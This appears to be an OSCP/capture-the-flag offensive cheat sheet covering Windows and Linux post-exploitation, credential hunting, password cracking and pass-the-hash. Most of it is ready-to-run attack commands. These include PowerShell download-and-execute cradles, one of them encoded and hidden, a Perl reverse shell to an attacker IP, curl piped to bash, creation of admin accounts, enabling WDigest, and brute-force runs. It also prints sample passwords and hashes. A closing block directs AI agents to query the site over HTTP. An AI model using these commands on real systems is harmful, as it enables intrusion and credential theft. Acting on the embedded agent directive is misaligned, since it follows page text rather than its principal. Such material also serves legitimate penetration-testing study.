# Exploitation (공격) ## **Windows Exploitiation** ### Basic commands * Add user ``` net user $username $password /add ``` * Add a user to a group ``` net localgroup "$groupname" $username /add ``` * Create an local administrator account ``` net localgroup administrators $username /add ``` * Find out Windows System Information ``` systeminfo | findstr /B /C:"OS Name" /C:"OS Version" ``` * Windows Patch Status ``` wmic qfe get Caption,Description,HotFixID,InstalledOn ``` * Find Plaintext Password ``` findstr /si password .txt findstr /si password .xml findstr /si password *.ini ``` #### Find all those strings in config files ``` dir /s pass == cred == vnc == .config ``` #### Find all passwords in all files ``` findstr /spin "password" . findstr /spin "password" . ``` ### Download files from Attacker Box ( Kali ) to the target via powershell ``` powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.39/rev.ps1') ``` ``` powershell.exe invoke-webrequest -uri http://$attackerip/nc.exe -outfile C:\users\user\appdata\local\temp\nc.exe ``` #### Other downloading and uploading techinques Download Github repo: you need to manually edit the powershell script to run itself without -C or -command. For example, using [**Invoke-PowerShellTcp.ps1**](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) **in**​ /opt/nishang/Shells**/**Invoke-PowerShellTcp.ps1 Provoke this commmand maually by adding the command at the end of the powershell file. ``` Invoke-PowerShellTcp -Reverse -IPAddress $listenerip -Port 4444 ``` ![](https://gblobscdn.gitbook.com/assets%2F-Luj_UTA-FG9do0VYXMX%2F-M2Gyy7MYLmYjyw4FWmj%2F-M2Gz6uF6t-igRGi5ozA%2Fimage.png?alt=media\&token=530110e1-4dde-4c5f-8dc9-9a09a093c15d) ***You can copy the file to the victim and execute the command just by invoking DownloadString without Powershell –Command*** argument. This technique is wildly used to create so-called file-less malware where the evil script is executed directly in the memory of the victim machine without dropping any file as such on the harddisk. This technique is used to bypass signature based detection. ``` powershell.exe “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.8:8000/Invoke-PowerShellTcp.ps1')" ``` Or you can manually invoke the command via powershell string. For example, ``` powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.8:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress $listenerip -Port 4444" ``` Also for PS version 1 and 2 PS Version 1 ``` c:\Windows\System32\cmd.exe /c powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://45.58.34.196:8080/p')" ``` PS Version 2 ``` c:\windows\system32\cmd.exe /c PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAcwB0AEUAbQAuAG4AZQBUAC4AdwBlAGIAQwBsAEkARQBOAFQAKQAuAEQATwBXAG4AbABvAGEAZABGAEkAbABlACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBqAHQAYQBiA ``` ### Finding password files in Registry #### VNC ``` reg query "HKCU\Software\ORL\WinVNC3\Password" ``` #### Windows autologin ``` reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName ``` ``` reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword ``` Or via Powershell using Get-ItemProperty to exploit registry ``` PS > Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*" ``` #### SNMP Paramters ``` reg.exe query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" ``` #### Putty ``` reg.exe query "HKCU\Software\SimonTatham\PuTTY\Sessions" ``` #### Search for password in registry ``` reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` ### Finding credentials in Groups.xml ``` dir Groups.xml /s ``` On an atttacker box, you can decrypt Group Policy Password via: ``` gpp-encrpyt $password ``` {% hint style="info" %} Groups.xml can be found under the below path C:\ProgramData\Microsoft\Group Policy\History{$numbers}\Machine\Preferences\Groups {% endhint %} To find more information: ### **Finding admin credentials from AppData** ``` dir /a C:\Users\$user\AppData\Roaming\Microsoft\Credentials\ ``` ### **Running commands as a different user by using runas command** ``` runas /user:ACCESS\Administrator /savecred "cmd.exe C:\Users\Administrator\Desktop\root.txt > C:\Users\security\AppData\Local\Temp\test.txt" ``` ### Enable RDP in Windows Target ``` C:\Windows\system32>netsh firewall set service remoteadmin enable netsh firewall set service remoteadmin enable Ok. C:\Windows\system32>netsh firewall set service remotedesktop enable netsh firewall set service remotedesktop enable Ok. ``` ### Port 88 - Kerberoasting Once you have a user shell you can start kerberoasting to get other users' credentials. Without password ``` python GetUserSPNs.py -request active.htb/SVC_TGS ``` With password ``` GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request ``` Then try cracking the Kerberos ticket by ``` john GetUserSPNsOutput.txt --wordlist=/usr/share/wordlists/rockyou.txt ``` Then login with psexec.py. ``` psexec.py administrator@active.htb ``` You can choose a service for avoiding antivirus detection with --service-name. ``` psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100 -service-name LUALL.exe ``` ### Exploiting AD users You should import the 'activedirectory' module first. ``` Import-module activedirectory ``` Add an AD member to a Group ``` add-adgroupmember -Identity "$group" -Members $member ``` ### Other Useful commands Strings prints text strings embedded in binary files such as executables. ``` root@kali:~/htb/tally# strings tester.exe !This program cannot be run in DOS mode. Rich7J ~~~ ~~~ SQLSTATE: Message: DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G; select * from Orchard_Users_UserPartRecord ~~~ ~~~ ``` Transfering file to windows ``` echo open $attackerip 21> ftp.txt echo USER offsec password>> ftp.txt echo bin>> ftp.txt echo GET shell.php >> ftp.txt echo bye >> ftp.txt ``` Then run ``` ftp -v -n -s:ftp.txt ``` #### List out all schedule tasks ``` schtasks /query /fo LIST /v ``` And extra misc to check: #### Find GPP Passwords in SYSVOL `findstr /S cpassword $env:logonserver\sysvol\*.xml` `findstr /S cpassword %logonserver%\sysvol*.xml (cmd.exe)` #### Run Powershell prompt as a different user, without loading profile to the machine \[replace DOMAIN and USER] `runas /user:DOMAIN\USER /noprofile powershell.exe` #### Insert reg key to enable Wdigest on newer versions of Windows `reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1` ## Linux Exploitation ### Spawing a intereactive TTY linux shell ``` python -c 'import pty; pty.spawn("/bin/sh")' export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin ``` Then Ctrl-Z ``` stty raw -echo fg ``` > Type reset and hit return. ### Exploiting Directory #### Find any writable directories ``` find / -type d ( -perm -g+w -or -perm -o+w ) -exec ls -adl {} \; ``` Or use ``` find / -writable -type d 2>/dev/null find / -perm -222 -type d 2>/dev/null find / -perm -o w -type d 2>/dev/null ``` #### Finding only Executable folders ``` find / -perm -o x -type d 2>/dev/null ``` #### Finding Writable and executable folders ``` find / ( -perm -o w -perm -o x ) -type d 2>/dev/null ``` #### Find commands that allows you to run as root with no password ``` sudo -l ``` You'll see the similar result as below. As you can see, User shelly can use /usr/bin.perl as root with no password. ![](/files/-M1s43kgcbNoxtMeyheH) ![](file://C:\Users\GraceLee\AppData\Local\Temp\ct_tmp/1.png) e.g) If you are allowed to use perl command as root, you can get a revese shell stright ``` sudo perl -e 'use Socket;$i="10.10.14.43";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ``` If this doesn't give you any hints Check the kernel versions of the victim machines ``` uname -ar cat /proc/version cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based ``` Try googling the kernel version and PE exploits to try out. #### Check the bash histroy ``` cat .bash_history ``` #### Check the process it's running ``` ps aux | grep $service ``` ### Finding Plaintext Passwords in web server #### Plaintext Password in /var/www/html/\*.php ``` cat /var/www/html/config.php | grep password ``` #### In mail ``` cat /var/spool/mail | grep $item ``` Or using LinEnum.sh ``` LinEnum.sh -t -k password ``` #### Chekcing the service ti's running ``` netstat -anlp ``` ### GTFOBins SUID ``` find / -perm -u=s -type f 2>/dev/null ``` GUID ``` find / -perm -g=s -type f 2>/dev/null ``` ### Authomation Tools There are three useful automation tools that I use the most, which are #### LinEnum.sh ``` curl http://$attackerip/LinEnum.sh | /bin/bash chmod +x LinEnum.sh ./LinEnum.sh ``` #### pspy pspy is a command line tool designed to snoop on processes without need for root permissions. ``` Cron job watching with pspy ~/pspy (master) $ make example ``` ### Other useful commands #### List out all scheduled tasks ``` schtasks /query /fo LIST /v ``` List the capability of a file ``` getcap -r / 2>/dev/null ``` ## Password Cracking Belw are the Cracking methonlogy used in CTF challanges. ### Creating a password list 1\) You can create your own dictionary or combing two different wordlists by ``` cat wordlist >> wordlist2 ``` 2\) Create a customised wordlist from html page ``` curl http://example.com > example.txt html2dic example.txt ``` Or use **Cewl** ``` cewl -w createWordlist.txt -m 6 https://www.example.com ``` -w is the minimum password length. ### Cracking Tools To identify which hash type it is encrypte with, use either of below commands build in Kali ``` hash-identifier hasid ``` {% hint style="info" %} Online Tools to find Hash Type {% endhint %} #### Cracking Hash Two Kali built-in tools can be used, *hashcat* and *john.* Hashcat ``` hashcat -m 13100 -a 0 -o found.txt admin.hash /usr/share/hashcat/rules/rockyou-30000.rule ``` -m= hash mode, 13100 denotes Kerberos 5 TGS-REP etype 23 -a=mode, 0 denotes straight -o= output John the ripper ``` john --wordlist=wordlist.txt dump.txt ``` ### Keepass password ``` keepass2john CEH.kdbx > crackthis.hash john --wordlist=wordlist.txt crackthis.hash Or hashcat64.exe -m 13400 .\crackthis.hash .\rockyou.txt ``` ### Putty key ppk to SSH key ``` puttygen my_private_key.ppk -O private-openssh -o alice.key chmod 600 alice.key ``` ### **Linux shadow password** First you need to combine the passwd file with the shadow file using the unshadow-program. ``` unshadow passwd-file.txt shadow-file.txt > unshadowed.txt john --rules --wordlist=wordlist.txt unshadowed.txt ``` ### Decoding Base64 ``` cat $encodedfile | base64 --decode > decodedfile.txt ``` {% embed url="" %} #### Cracking Unzip file password ``` fcrackzip -D -p /usr/share/wordlists/rockyou.txt data.zip ``` #### Convert Hex to Binary ``` cat hex.txt | xxd -r -p ``` ### Online Tools {% embed url="" %} {% embed url="" %} ### Cracking password for Services #### Port 22- SSH ``` hydra -l root -P wordlist.txt $targetip ssh hydra -L userlist.txt -P pass.txt ssh://$targetip ``` #### Cracking Priave RSA Key ``` python ssh2john.py user_rsa > crackable.txt john --wordlist=/usr/share/wordlists/rockyou.txt crackable.txt ``` #### Port 161 - SNMP ``` hydra -P wordlist.txt -v 102.168.0.101 snmp ``` #### Port 3389 - RDP ``` ncrack -vv --user admin -P password-file.txt rdp://192.168.0.101 ``` #### Port 80/443 htaccess #### Password protect directory with htaccess **Step 1** Create a directory that you want to password-protect. Create .htaccess tile inside that directory. Content of .htaccess: ``` AuthType Basic AuthName "Password Protected Area" AuthUserFile /var/www/html/test/.htpasswd Require valid-user ``` Create .htpasswd file ``` htpasswd -cb .htpasswd test admin service apache2 restart ``` This will now create a file called .htpasswd with the user: test and the password: admin If the directory does not display a login-prompt, you might have to change the **apache2.conf** file. To this: ``` AllowOverride AuthConfig ``` **Then bruteforce with** ``` medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/test -T 10 ``` **Tomcat Apache** ``` hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http://10.10.10.95:8080/manager/html ``` #### HTTP POST Login Form ``` hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect*” ``` ### Pass The Hash You can authenticate services by using a valid username and the hash value without a decrypted password. #### SMB PTH ``` export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 ``` ``` pth-winexe -U administrator //$targetip cmd pth-winexe -U admin/$hash:has //$targetip cmd ``` e.g) ``` pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe ``` ``` smbclient //$targetip/C$ -U "$targetuser" --pw-nt-bash $hash ``` #### RDP PTH By using evil-winrm ``` evil-winrm -u "$targetuser" --hash $hash -i $targetip ``` By using freerdp-x11 ``` apt-get install freerdp-x11 xfreerdp /u:admin /d:win7 /pth:hash:hash /v:$targetip ``` ## Misc: Windows Password check in SAM You can check two fundamental files from Windows, system registry and SAM registry. ``` Systemroot can be windows %SYSTEMROOT%\repair\SAM windows\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM System file can be found here SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\RegBack\system ``` Then extract the hashed password ``` pwdump system sam ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.xn--hy1b43d247a.com/misc/host-based-cheatsheet-feat.-oscp/exploitation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.